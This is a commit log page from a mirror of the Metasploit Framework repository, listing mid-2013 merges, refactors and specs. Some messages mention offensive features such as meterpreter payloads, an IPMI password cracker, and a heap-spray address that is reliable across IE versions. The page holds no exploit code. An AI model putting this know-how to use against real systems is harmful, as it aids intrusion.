infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
21,685 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

6868 Commits (3247106626305ea6deb284adf57e958853c53564)

Author SHA1 Message Date
sinn3r 92d57ef37d Fix merge conflict 
Conflicts:
	msfvenom
 2013-08-13 00:00:16 -05:00
James Lee 3827b14103 Land #1726, ssl verify mode 
Conflicts:
	lib/rex/socket/parameters.rb
Fix doc strings
 2013-08-12 17:57:10 -05:00
jvennix-r7 8278808a37 Merge pull request #2204 from todb-r7/bug/undo-optstring-validator 
Revert "OptString specs and better validation"
 2013-08-09 13:42:46 -07:00
Tod Beardsley 02f460287b Revert "OptString specs and better validation" 
This reverts commit d66779ba4c.

Specifically, this commit was causing trouble when a datastore was
getting an Integer. For some reason (as yet undiscovered), the option
normalizer wasn't trying to Integer#to_s such arguments.

This kind of thing is going to happen a lot. For now, I'd rather just
end up with the ducktype, and attack the normalizer in a seperate fix.
 2013-08-09 15:30:42 -05:00
sinn3r 4558aca7ca Land #2136 - Removed requirement for note.data to be present 2013-08-09 15:29:25 -05:00
Meatballs 08c32c250f File versions 2013-08-08 19:42:14 +01:00
James Lee ab976ddf8f Fix genarate command in msfconsole 
Thanks @Meatballs1 for spotting
 2013-08-06 14:46:53 -05:00
Spencer McIntyre 2d69174c5b Initial commit of the python meterpreter. 2013-08-05 23:38:49 -04:00
allfro 9180dd59fe Patch for string encoding issues with `msgpack` 
Fixes an issue that causes exploits to fail if the PAYLOAD option is the last option to get marshalled in an MSFRPC dictionary. The patch adjusts the string's encoding to match the internal default encoding used by Ruby. Hence, making `fetch()` succeed.
 2013-07-30 13:38:44 -04:00
Tod Beardsley 7e539332db Reverting disaster merge to 593363c5f with diff 
There was a disaster of a merge at 6f37cf22eb that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).

What this commit does is simulate a hard reset, by doing thing:

 git checkout -b reset-hard-ohmu
 git reset --hard 593363c5f9
 git checkout upstream-master
 git checkout -b revert-via-diff
 git diff --no-prefix upstream-master..reset-hard-ohmy > patch
 patch -p0 < patch

Since there was one binary change, also did this:

 git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf

Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
 2013-07-29 21:47:52 -05:00
jvazquez-r7 05be76ecb7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-29 16:41:22 -05:00
jvazquez-r7 593363c5f9 Land #2154, @wchen-r7's msfcli optimizations and refactoring 2013-07-29 16:38:32 -05:00
jvazquez-r7 455569aee8 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-29 12:10:12 -05:00
jvazquez-r7 0851974408 Land #2162, @Meatballs1's exploit for ms13-005 2013-07-29 11:43:31 -05:00
Meatballs 9ad99ed4ca I am a git genius 2013-07-29 17:01:57 +01:00
Meatballs 0329caec5f Revert "Fixup psh datastore" 
This reverts commit aa64f5cd58.
 2013-07-29 17:00:28 +01:00
Meatballs aa64f5cd58 Fixup psh datastore 2013-07-28 21:53:11 +01:00
sinn3r a0decf502f Refactor msfcli 2013-07-28 12:40:50 -05:00
Meatballs 234e49d982 Add type technique 2013-07-26 23:33:16 +01:00
Meatballs b99ad41a64 Add api constants and tidy 2013-07-26 01:48:39 +01:00
jvazquez-r7 4a0b33241f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 18:41:50 -05:00
sinn3r 7b7603a5e7 Land #2104 - reverse_https_proxy 2013-07-25 17:26:56 -05:00
Meatballs 0235e6803d Initial working 2013-07-25 23:24:11 +01:00
jvazquez-r7 33f6f7e8fc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 17:03:45 -05:00
William Vu 27a540e12f Land #1215, creds reuse for AuthBrute modules 2013-07-25 16:54:44 -05:00
William Vu dac9ac4a1d Land #2159, spool command nil dereference fix 2013-07-25 15:38:35 -05:00
James Lee a5ca516435 Fix nil deref in spool command 
Occurs when no module is currently `use`d
 2013-07-25 14:51:39 -05:00
Meatballs 1d2d4b5345 Add some null checks 2013-07-25 18:35:11 +01:00
jvazquez-r7 2b3dcaf678 Land #2157, @wvu and @averagesecurityguy patch for OpenVAS XML Reports importing 2013-07-25 12:04:38 -05:00
William Vu 97680304d6 Use index, since it can apparently do regex 2013-07-25 12:00:33 -05:00
jvazquez-r7 5014919198 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 09:02:20 -05:00
sinn3r 56367ef69c Update documentation 2013-07-24 19:04:47 -05:00
sinn3r 0fd2c385fb Update documentation 2013-07-24 19:02:10 -05:00
sinn3r e266d1bd0a Add comment about opts 2013-07-24 19:00:58 -05:00
sinn3r a71d7eb372 Update archive.rb to handle whitelist 2013-07-24 18:59:43 -05:00
sinn3r 9ae550c883 Do if [].empty?. Avoid msfcli running as a job 2013-07-24 18:35:06 -05:00
sinn3r ed51d284fa Change name, change how data is passed, fix rspec 2013-07-24 17:15:56 -05:00
jvazquez-r7 214f337f58 Fix indentation 2013-07-24 16:55:01 -05:00
Meatballs c221360cc1 Retab 2013-07-24 22:16:41 +01:00
sinn3r e120ecfba9 msfcli is designed to load only one module (auxiliary or exploit), 
so we shouldn't have to load all of them to run this utility. The
overall goal of this PR is to narrow down what modules
(exploit/aux + payload + encoder + nop) you possibly need in order
to shave off loading time. By doing this, on my box this is 5-6
seconds faster than the original one.

I actually tried to avoid making too many changes in the library
(such as Module Manager), because we don't have test cases for them,
and we can't really afford to risk breaking it. I also developed
a test script to actually be able to test msfcli.
 2013-07-24 14:40:46 -05:00
jvazquez-r7 e9a4f6d5da Merge branch 'dll_fix' of https://github.com/Meatballs1/metasploit-framework 2013-07-24 14:00:52 -05:00
Meatballs fee5fabb91 Revert x64 corruption changes 2013-07-24 19:59:04 +01:00
Meatballs 44cae75af1 Cleanup 2013-07-24 19:52:59 +01:00
Meatballs edc297756b Tabs 2013-07-24 19:14:11 +01:00
Meatballs 4b84b49674 Fix payload corruption 2013-07-24 19:08:02 +01:00
jvazquez-r7 47c21dfe85 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-24 11:42:11 -05:00
Tod Beardsley 00630376c3 Revert the default call to firefox 
This reverts commit 0928a370f3.

No, no, you guys are right in the comments for #2148. The call to
system is inside the else, but the tabbing made my eyes cross.
Sorry about that. Someday soon, @tabassassin will save us all from these
kinds of screw ups in mental parsing.
 2013-07-23 16:13:02 -05:00
William Vu d493346691 Land #2137, fixes and specs for Opt containers 2013-07-23 15:58:09 -05:00
jvazquez-r7 b0c17fdebc Land #2002, @jlee-r7's patch for better handling uri resources 2013-07-23 15:49:21 -05:00
David Maloney 621568bf8f Another Error Type needs caught 
Different systems throw a different error
Need to rescue that error too
 2013-07-23 15:47:42 -05:00
William Vu 86ab942435 Land #2146, Unix and Windows path normalization 2013-07-23 15:23:41 -05:00
Tod Beardsley 0928a370f3 Adding back default firefox 
the default is triggered only outside the case statement, which itself
is totally bizarre. I can't tell if anyone is relying on this behavior
right now, but it's too premature to just remove it out at this point.
 2013-07-23 14:43:30 -05:00
Tod Beardsley 53c3fd2ce7 Update comment docs on Rex::Compat.open_browser 2013-07-23 14:38:04 -05:00
ZeroChaos ce5742461a update open_browser functionality 
open_browser didn't support xdg-open or firefox-bin.  xdg-open was made the default as it is the most likely to succeed afaik.

the fallback to firefox was removed because since we check for the existence of firefox is makes no sense to try to run it after we failed to find it.  This will silently fail if no supported browser is found due to suggestions from the msf team:

< Zero_Chaos> more importantly, it would be great if someone told me how to spit out a message to the user
< Zero_Chaos> because I have no clue :-)
<@egypt> Zero_Chaos: it's in rex, so the answer is "don't"
 2013-07-23 14:58:16 -04:00
Tod Beardsley bb16683415 Land #2087, @egypt's random ID generator 2013-07-23 13:52:08 -05:00
sinn3r 958a4edd73 Keep the trailing slash if the user wishes 2013-07-22 20:46:18 -05:00
sinn3r 359009583f Drop support for UNC path parsing in normalize_win_path 
Not really a good idea to try to parse UNC format. Confuses the
purpose of the function.
 2013-07-22 20:20:45 -05:00
sinn3r 4b3fce9349 Add functions to normalize Winodws & Unix paths 
The purpose of these functions is to be able to join file/dir paths
safely without trailing slashes, basically for the same reason as
normalize_uri.  Some modules are really buggy when merging paths,
so instead of letting them do it, it's better to use these functions.
 2013-07-22 19:26:04 -05:00
jvazquez-r7 99a345f8d1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-22 13:54:26 -05:00
jvazquez-r7 77e8250349 Add support for CWE 2013-07-22 12:13:56 -05:00
jvazquez-r7 15b0e39617 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-21 13:47:40 -05:00
David Maloney 943dde5c6c OptRegexp specs 2013-07-20 18:44:55 -05:00
David Maloney d66779ba4c OptString specs and better validation 2013-07-20 17:49:03 -05:00
David Maloney d6f2b28708 More opt specs 2013-07-20 17:37:39 -05:00
sinn3r 757cf18bb4 Land #2135 - Update FF detection 2013-07-20 13:10:14 -05:00
Samuel Huckins 832db57171 Removed requirement for note.data to be present. It wasn't required in 
the model or in specs, but was in db.rb, resulting in an error during
certain import scenarios.
 2013-07-20 10:27:12 -05:00
Joe Vennix 92ae90b828 Whitespace fixes. 2013-07-19 17:27:27 -05:00
Joe Vennix 2e838d7be3 Fix minor bugs discovered when testing. 2013-07-19 17:18:39 -05:00
Joe Vennix 7e2fc147f1 Add updated versions of firefox. 2013-07-18 16:35:57 -05:00
David Maloney ec82644bd3 mo fixes mo specs 
SEERM #7536
SEERM #7537
 2013-07-18 15:00:57 -05:00
jvazquez-r7 1a5e0e10a5 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-18 13:53:57 -05:00
sinn3r 9d92b38dc7 Land #2121 - add specs for module search filter 2013-07-18 13:50:26 -05:00
Joe Vennix 67d8c1170b Remove unnecessary whitespace. 2013-07-18 13:43:30 -05:00
David Maloney 57dd525714 More optaddressrange specs and fixes 
SEERM #7536
 2013-07-18 13:03:32 -05:00
Joe Vennix f4b0ab8184 Adds 141 passing specs to Msf::Module#search_filter. 
* tests exclusion functionality, type: matching, port: matching, app: matching,
   platform: matching, author: matching, text: matching, name: matching, and
   path: matching.
[RM #4790]
 2013-07-18 12:47:08 -05:00
David Maloney 22e4db04e0 opening specs and fixes for OptAddressRange 2013-07-18 12:44:48 -05:00
David Maloney 27e2469d8e Specs and code changes for OptAddress 
handles wierness around Optaddress.
Still need to address isues in optaddressRange

FIXRM #7537
 2013-07-17 20:21:24 -05:00
jvazquez-r7 58229ff8b7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-17 20:18:48 -05:00
sinn3r 7f7cb4f59a Land #2114 - Fix object detection for '5716599' 
[FixRM 7252]
 2013-07-17 18:23:17 -05:00
Tod Beardsley 72df070b80 Bump version to 4.8.0-dev, -rls is so fleeting 2013-07-17 16:43:24 -05:00
Tod Beardsley 8d1a760b1f Bump version to -rls 2013-07-17 16:42:37 -05:00
James Lee 9d56e58e84 Rely on object detection for '5716599' 
[SeeRM #7252]
 2013-07-17 15:47:25 -05:00
jvazquez-r7 458ac5f289 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-17 15:02:33 -05:00
jvazquez-r7 11f8b351c0 Merge branch 'nvidia' of https://github.com/Meatballs1/metasploit-framework 2013-07-17 11:44:42 -05:00
William Vu 54af2929f5 Land #2109, kill stray character 2013-07-16 11:11:06 -05:00
Joe Vennix 34e732eabd Kill stray character in whitespace gutter. 2013-07-16 10:14:41 -05:00
Alexandre Maloteaux a5d526d710 remove metsrv.dll 2013-07-15 17:16:21 +01:00
Alexandre Maloteaux e28dd42992 add http authentification and socks 2013-07-15 15:36:58 +01:00
William Vu fdd577598a Land #2095, go_pro fix for Kali 2013-07-15 04:27:56 -05:00
Alexandre Maloteaux f48c70d468 enable tor and small fix 2013-07-13 17:59:49 +01:00
James Lee 94f8b1d177 Land #2073, psexec_psh 2013-07-12 16:14:17 -05:00
James Lee 91b748a701 Make it clear where we failed 
Even when VERBOSE=false
 2013-07-12 15:57:30 -05:00
corelanc0d3r e8983a21c5 New meterpreter payload reverse_https_proxy 2013-07-12 16:45:16 -04:00
William Vu e8294b4f02 Add tentative fixes 2013-07-12 07:12:07 -05:00
James Lee 1ac1d322f2 Dup before modifying 
Because `remove_resource` modifies @my_resources, we can't call it while
iterating over the actual @my_resources. The following snippet
illustrates why:

```
>> a = [1,2,3,4]; a.each {|elem| a.delete(elem); puts elem }
1
3
=> [2, 4]
```

[See #2002]
 2013-07-12 00:57:10 -05:00
James Lee 38e837dc28 Remove inaccurate comment 2013-07-11 22:48:35 -05:00
g0tmi1k a4d96d37f3 Updated regex 2013-07-11 21:16:02 +01:00
g0tmi1k ff62a85501 command_dispatcher/core.rb - Made msftidy happy 2013-07-11 10:52:25 +01:00
g0tmi1k b2fe31e30f go_pro - fix start with kali linux 2013-07-11 10:42:26 +01:00
RageLtMan 9445cb74bf fix copypasta 2013-07-10 21:03:49 -04:00
RageLtMan f7cf783e25 Allow selection (and ordering) of column names 
Build the creds table with only the columns we select,
in the order selected.

Example:

creds -s ssh -u root -S pubk -c port,user,proof

Credentials
===========

port  user  proof
----  ----  -----
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=a6:...
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=a6:...
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=a6:...
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=a6:...
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=30:...
22    root  KEY=37:...
22    root  KEY=a6:...
22    root  KEY=30:...
22    root  KEY=37:...
 2013-07-10 20:46:34 -04:00
RageLtMan 987d6a671f Allow passing MaxChar to Rex::Ui::Text::Table cols 
Passing MaxChar allows setting the maximum number of characters
printed within a specific column during the row_to_s method.
This does not affect CSV output nor truncate the actual data.
Meant for tidying up long console ouput.

Example: cleaned up cmd_creds to show proof and not maul tables
with unix session data.
 2013-07-10 20:00:40 -04:00
William Vu f267c11bc4 Add regex fix 2013-07-10 15:43:16 -05:00
James Lee 85affe4d47 Land #2089, smb last_filename can be nil 2013-07-10 14:18:00 -05:00
Tod Beardsley 56ffa4ae2f Fixes for network_interface PR #2085 
Implementing the suggestions from @limhoff-r7.

See #2085

FixRM #8023
FixRM #7943
 2013-07-10 13:25:06 -05:00
Tod Beardsley 8ade33552c Land #2085, use the new network_interface gem. 2013-07-10 13:15:01 -05:00
James Lee 4cc179a24c Store inverted hash for better lookups 
Also clarifies comment about infinite loops
 2013-07-10 12:38:42 -05:00
sinn3r 71974a8535 to_addr_hex_dump is never used and is too similar to to_hex_dump 
Not so much value in to_addr_hex_dump, as Meatballs1 suggested, we
should remove this.
 2013-07-10 11:09:47 -05:00
sinn3r add294d999 Fix potential nil in last_filename 
Replacing #2060.  It is possible to get a nil in last_filename if
the sub! function doesn't find any 0x00s to replace, so instead
it's best to use sub(), which should at least return the original
filename.  To make sure we don't hit any other unknown conditions
that may result in nil last_filename, it's also convert with to_s
to make sure it's always a string.
 2013-07-09 12:50:19 -05:00
James Lee afa6a36df3 Make first char's character class configurable 2013-07-09 02:50:28 -05:00
James Lee 273046d8f0 Add a class for generating random identifiers 
Will be useful for all kinds of things, but brought about in discussions
specifically for Util::EXE in #2037.
 2013-07-09 02:06:44 -05:00
lsanchez-r7 4541a9e49e now with passing msftidy 2013-07-08 17:44:50 -05:00
lsanchez-r7 5c93fb2849 arp_sweep is once again working 
modified the capture mixin to use NetworkInteface instead of
pcaprub for interfaces and addresses

FIXRM #8023,#7943
 2013-07-08 17:24:28 -05:00
James Lee 00c7581099 Fix constant names and 'exe-only' 
That'll teach me to commit before the specs finish.

Really [FixRM #8149]
 2013-07-06 12:39:15 -05:00
James Lee 1b504197be Check equality instead of regex 
Thanks, @Meatballs1 for finding the cause of this bug!

[FixRM #8149]
 2013-07-06 12:29:37 -05:00
Meatballs 2bfe8b3b29 msftidy 2013-07-05 22:35:22 +01:00
Meatballs 0ce3fe2e7c Added service status checks to Post::Windows::Services 
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
 2013-07-05 22:25:04 +01:00
jvazquez-r7 0e2380c115 Fix method documentation 2013-07-05 11:19:53 -05:00
jvazquez-r7 bcf6d11442 Land #2049, @wchen-r7's had_pid? method work 2013-07-05 11:19:11 -05:00
Meatballs 1a0bdf335e Retab lib 2013-07-04 12:09:46 +01:00
Meatballs a76ee6c2ec Add flexibility to lib 2013-07-04 11:03:48 +01:00
Meatballs 1368c1c27f Move options to lib 2013-07-04 10:25:08 +01:00
Meatballs 03de8c1c3d Pull in exploit/powershell 2013-07-04 09:54:40 +01:00
James Lee e330916744 Pull out common stuff in Util::EXE/MsfVenom tests 2013-07-03 12:25:15 -05:00
g0tmi1k 38b83ba335 ui/banner~Made msftidy happy 2013-07-03 00:29:42 +01:00
William Vu 67f30a6828 Land #1739, resolve workspace rename issues 2013-07-02 16:09:59 -05:00
sinn3r 0f37bbe78e Add has_pid? function 
[SeeRM:#8123] - Add commonly used function has_pid?. Related to
redmine issue 8123.
 2013-07-02 14:33:15 -05:00
William Vu 28a4a05991 Land #2046, base argument for to_hex_dump 2013-07-02 12:11:05 -05:00
sinn3r 98c214d2fb Allow 0 base address, and dynamic left column length 2013-07-02 11:40:23 -05:00
jvazquez-r7 2ceb404f7d Land #2047, @hmoore-r7 ipmi related work 2013-07-02 11:13:25 -05:00
sinn3r 9eb32ea9af Allow "base" argument for to_hex_dump 
[SeeRM:#8121] - For debugging purposes, it's useful to be able to
specify a base.
 2013-07-01 23:56:51 -05:00
jvazquez-r7 2751470c71 Add @jlee-r7's feedback to sapni proxies support 2013-07-01 21:37:53 -05:00
jvazquez-r7 9c4d869ed8 Land #1018, @nmonkee's support for sap router proxies 2013-07-01 21:36:02 -05:00
James Lee 1466609c86 Add more supported formats to exe generation 
- Already supported, just added calls to the the right methods in
  the .to_executable_fmt method:
  - Linux armle, mipsle, and mipsbe
  - Mac arm, ppc

- makes the two (!?) copies of block_api for windows match more closely
  with the source used elsewhere. This is still needs to be refactored
  to get rid of the duplication.

- Get rid of some of the logic in msfvenom duplicated from Util::EXE
 2013-07-01 17:36:58 -05:00
HD Moore 8e4dd29a4c Add cipher zero scanner 2013-06-30 02:35:37 -05:00
jvazquez-r7 a5c3f4ca9b Modify ruby code according to comments 2013-06-29 08:54:00 -05:00
sinn3r e3989ad30c Extra comments, no thanks 2013-06-28 15:44:06 -05:00
sinn3r f4c805f5d6 Yarrrrrrrrd 2013-06-28 15:42:56 -05:00
sinn3r 6e1fa05757 Fix a handle leak & change thread creation flag 2013-06-28 13:23:08 -05:00
sinn3r 554d738f26 Update documentation 
Fix broken English
 2013-06-28 13:03:05 -05:00
sinn3r b7430cb569 Add Msf::Post::Windows::Process 
The purpose of Msf::Post::Windows::Process is have all the common
functions you might need to do something to a process, for example:
injecting something to a process and then run it.
 2013-06-28 12:55:06 -05:00
David Maloney ea13ac48ec "fix" indentation to make egypt happy 2013-06-27 17:16:13 -05:00
David Maloney 89faba288d damnit brandon turner 2013-06-27 17:12:37 -05:00
David Maloney 867be1257a slight rearrangement 2013-06-27 17:09:20 -05:00
David Maloney e3fde02eec conditional wrapping 
as per egypt's catch
 2013-06-27 17:07:16 -05:00
David Maloney 70433820a9 fixes FD leak in RPC client 
FD leak due to sockets not getting closed
on the rpc client
FIXRM #8107
 2013-06-27 16:57:02 -05:00
Josh d7eda343e9 fix typo in comment 
change runing to running
 2013-06-27 03:12:49 -05:00
HD Moore 4fb6fa67f2 Fix require for constants, trim useless fields from banner 2013-06-26 09:59:40 -05:00
HD Moore 84117e28a8 Remove stale constants.rb require 2013-06-26 09:52:15 -05:00
James Lee 31ad7b50a9 Fix write_file on FreeBSD 
[SeeRM #8083]
 2013-06-25 17:19:00 -05:00
James Lee b3b94c7a73 Break packet classes into their own files 
This makes the file structure match the class structure and makes the
source tree easier to grok.
 2013-06-24 19:24:09 -05:00
HD Moore 1801a5a270 Better HP iLO compatibility (retry on session ID error) 2013-06-24 14:23:53 -05:00
Daniele Martini c0fda81eb0 Removed options DB_ADD_ALL. Added options DB_ALL_PASS and DB_ALL_USERS 
to add already known user and passwords to the lists.
 2013-06-23 18:20:41 +02:00
HD Moore c869112407 Cleanup, reporting, and automatic cracking 2013-06-23 01:35:31 -05:00
HD Moore 5656e0cb7a Initial commit of IPMI library, scanner, & cracker 2013-06-22 23:38:28 -05:00
James Lee 3c42fe594e No need to have rescue around a print 2013-06-21 15:55:43 -05:00
James Lee 2c12a43e77 Add a method for dealing with hardcoded URIs 2013-06-21 15:48:02 -05:00
James Lee 39d011780e Move deletion into #remove_resource 
Doing it here means that modules manually calling remove_resource won't
screw up the cleanup
 2013-06-21 15:34:54 -05:00
James Lee e8a92eb196 Keep better track of resources 
[See #1623]
[SeeRM #7692]
 2013-06-21 14:51:47 -05:00
Meatballs 6c62463f83 Add ipv6 resolution and remove nix 2013-06-20 22:17:31 +01:00
James Lee 81b4efcdb8 Fix requires for PhpEXE 
And incidentally fix some msftidy complaints
 2013-06-19 16:27:59 -05:00
jvazquez-r7 1aff778a79 Fix unpack 2013-06-18 09:06:44 -05:00
jvazquez-r7 8ae8f25d56 Land #1961, @wvu-r7's normalization of command_dispatcher/db.rb 2013-06-18 08:57:32 -05:00
jvazquez-r7 3f665ba5a0 Skip also max-age from cookies 2013-06-17 14:04:08 -05:00
HD Moore 819080a147 Enable rhost/rport option overrides in HttpClient 2013-06-17 11:45:01 -05:00
Meatballs 1637651bbb Revert multilang test 2013-06-15 17:48:32 +01:00
Meatballs 62e335dab2 Resolve conflict 2013-06-15 17:40:37 +01:00
Meatballs fc7d151273 Add multilang syscheck 2013-06-15 17:39:01 +01:00
William Vu 53077d4c1a Add a newline before the delete message 2013-06-14 19:58:19 -05:00
William Vu cfd05bc68f Normalize comments 2013-06-14 17:32:33 -05:00
William Vu 0a9a8a57e3 Remove double newlines 2013-06-14 17:20:26 -05:00
William Vu bb02cc8509 Normalize the syntax and output of db.rb 2013-06-14 17:11:47 -05:00
Tod Beardsley d341b825d0 Rename dirbust option to conform to style 2013-06-14 12:58:08 -05:00
Tod Beardsley 2971e50d06 Land #1949, make dirbusting optional for crawler 2013-06-14 11:54:28 -05:00
jvazquez-r7 f5b00512e0 Fix sap ni proxy, hopefully 2013-06-13 17:15:48 -05:00
Brandon Perry 3cb851e4e0 Merge remote-tracking branch 'todb-r7/fix-msftidy-1944' into csharp_payload 2013-06-12 17:29:00 -05:00
Brandon Perry 0f06e9b08c Merge branch 'master' of https://github.com/rapid7/metasploit-framework into csharp_payload 2013-06-12 17:27:55 -05:00
Tasos Laskos b509ac8504 Crawler mixin: Dirbusting opt moved to advanced 2013-06-13 00:04:31 +03:00
Tasos Laskos b474cda4aa Crawler/Anemone: Dirbusting now optional 
[FIXRM #8030]

Anemone updated to make dirbusting optional (on by default) and the Crawler core
module updated to provide an option to do so.
 2013-06-13 00:00:09 +03:00
Samuel Huckins 8287dd314f Merge pull request #1941 from jlee-r7/http-server-inspect 
Functional tests in msfconsole passing, as are MSF and Pro specs. References in Pro to items that appeared session related were either debug oriented or commented out.
 2013-06-12 12:54:29 -07:00
Tod Beardsley 9c75d821d1 Fix up msftidy warnings on rex/text.rb 2013-06-12 11:17:58 -05:00
Brandon Perry d0e1e4df0a This commit adds support for C# byte arrays for the assembly payloads. 2013-06-11 19:27:06 -05:00
Brandon Turner 132769d415 Merge branch 'release' 2013-06-11 18:52:11 -05:00
Brandon Turner 72b3ea2be0 Merge pull request #1943 from shuckins-r7:bug/nx-asset-group-push 2013-06-11 18:41:49 -05:00
Samuel Huckins d5be41617e Uses raw-xml-v2 Nexpose export for Nexpose import as this adds device-id 
back to XML schema and will result in hosts that can be pushed back to
Nexpose.

[Bug #51521175]
 2013-06-11 18:37:02 -05:00
Tod Beardsley 6a5d1d06b2 Make the conditional correct for print_prefix 
Fixes a bug introduced on #1936.
 2013-06-11 16:16:17 -05:00
James Lee af613ee254 Add a more readable #inspect 2013-06-11 15:22:49 -05:00
Tod Beardsley f775a0bb01 Handle single quotes for OpenVAS import 2013-06-10 19:45:50 -04:00
AverageSecurityGuy e05763149a Fixed issue downloading XML reports 
The XML report has an extra </report> tag which prevents the .text
method from working properly. I used the .to_s method instead.

I also moved the rescue statement because it was masking other errors
that were being raised.
 2013-06-10 19:45:50 -04:00
Tod Beardsley 9a08090b0f Inch toward making modules more testable 2013-06-10 16:02:19 -05:00
Tod Beardsley d4e9431633 Add Gemfile entry for PacketFu 2013-06-10 14:18:05 -05:00
Tod Beardsley 7dafcc76df Remove packetfu and pcaprub libaries 
These should be handled by bundler's Gemfile.
 2013-06-10 14:12:18 -05:00
Tod Beardsley 31faf65271 Land #1929, spool ui fix from @jsherwood0 2013-06-10 12:30:50 -05:00
John Sherwood 7ac5b6de53 Fix prompt and color issue with cmd_spool 
Changing spool setting caused problems with prompt and color. This
fix makes the following changes:

- Saves the color setting and re-applies it to the new output console
- Sets the prompt in the same way that cmd_use does
 2013-06-09 13:35:35 -04:00
David Maloney 6aa7c74fdd make anemone also rspect domain 2013-06-07 14:24:14 -05:00
David Maloney 78b2a0a2ac add domain support to web spider 2013-06-07 12:41:20 -05:00
sinn3r 8e2de6d14f Updates js_property_spray documentation 
After many tests, it turns out address 0x0c0d2020 is the most
consistent location acorss various IE versions.  For dev purposes,
it's rather important to have this documented somewhere.

Thanks to corelanc0d3r for the data.
 2013-06-07 00:28:22 -05:00
sinn3r 9466022194 Land #1847 - Add sorting functionality to notes command 2013-06-05 12:17:54 -05:00
sinn3r 026c658260 Comply with the case-sensitive rule 2013-06-05 12:16:38 -05:00
David Maloney 2e26256217 was missing a nil check 2013-06-04 14:21:07 -05:00
David Maloney c4475538e7 Report on TaskSession associations 
add TaskSession objects so when we report
on a session, we know what Task created it, if there
was a task
 2013-06-04 13:42:36 -05:00
sinn3r 937d7fb762 Landing #1835 - Fix a backwards disasm bug which stomps on the depth opt 2013-05-31 16:28:49 -05:00
sinn3r df2140ea59 Add back the tmp include check according to bannedit's feedback 2013-05-31 16:26:52 -05:00
sinn3r dacc73a60f Improve readability based on Egypt's feedback 2013-05-31 16:24:27 -05:00
sinn3r 90117c322c Landing #1874 - Post API cleanup 2013-05-31 16:15:23 -05:00
Luke Imhoff cc60c95243 Rescue Errno::ENONENT when using File.mtime for memory cache 
[#47720609]
 2013-05-30 13:16:43 -05:00
Luke Imhoff 541d287e70 Merge branch 'master' into bug/module-load-cache-update 2013-05-30 12:59:50 -05:00
lsanchez-r7 8b488c3c6b Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port 
Add session_port to the mdm object

SEERM #7281
 2013-05-30 10:05:48 -07:00
James Lee 12f0448bb4 Use a LIKE test instead of equality 
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match

[SeeRM #7989]
 2013-05-29 16:27:33 -05:00
sinn3r 63694a6c87 Landing #1875 - Also remove *.ts.rb files 2013-05-28 17:29:02 -05:00
Tod Beardsley 14c4dbcf8c Also remove *.ts.rb files 
On the heels of #1862, this gets rid of the "test suites" that bound
together all the old unit tests.
 2013-05-28 17:05:44 -05:00
James Lee f3ff5b5205 Factorize and remove includes 
Speeds up compilation and removes dependency on bionic source
 2013-05-28 15:46:06 -05:00
James Lee 0466cce7b1 Move PostMixin to its own file 
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
 2013-05-28 15:46:06 -05:00
sinn3r 8cb1bdefb7 Landing #1849 - 32 and 64bit compatible to_winpe_only() function 2013-05-28 15:24:43 -05:00
Samuel Huckins e20385dd9e Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host 
Passes specs and functional tests
 2013-05-28 12:11:57 -07:00
James Lee 9843dc4cb4 Land #1708, android meterpreter 
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
 2013-05-28 12:19:45 -05:00
David Maloney 849d974463 Add session_port to the mdm object 
Mdm::Session was not being passed the session_port
FIXRM #7281
 2013-05-24 17:46:03 -05:00
Luke Imhoff 4ba571346e Spec Msf::Simple::Framework#init_module_paths 
[#47720609]
 2013-05-24 12:33:42 -05:00
Luke Imhoff c22178752e Merge branch 'master' into bug/module-load-cache-update 2013-05-24 11:06:16 -05:00
sinn3r e169ccab4f Landing #1862 - Remove inline unit tests 2013-05-23 22:19:29 -05:00
sinn3r cd947e2075 Landing #1861 - Implement check for auxiliary modules 
[FixRM:#7975]
 2013-05-23 22:10:54 -05:00
Luke Imhoff 1a487e476d Merge branch 'master' into bug/module-load-cache-update 2013-05-23 14:23:14 -05:00
David Maloney 0f21861921 Add task handling to imports 
allow imports to carry along task info

[Story #49167601]
 2013-05-23 13:33:19 -05:00
Tod Beardsley 05916c079e Inline unit tests are so last decade 
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) seperating out our tests from
our codebase.
 2013-05-23 12:41:14 -05:00
Tod Beardsley d44a158238 Land #1859, fix trailing newlines in zip. 
This incidentally fixes #1755 for real, where most of the discussion
of this bug took place.
 2013-05-23 12:00:48 -05:00
Tod Beardsley a852304ba3 DRY: Move check things to the common module level 
While it makes lots of sense to bring check to all modules, of course
some modules will not be able to actually use it. Namely modules like
nop and payload modules. If you're feeling creative, you could probably
come up with semantically similar checks for those, too.
 2013-05-23 11:42:41 -05:00
Tod Beardsley 7436fdad72 First, copy-pasta and add a test 2013-05-23 11:26:53 -05:00
David Maloney d8074c0bf4 Use create not new 
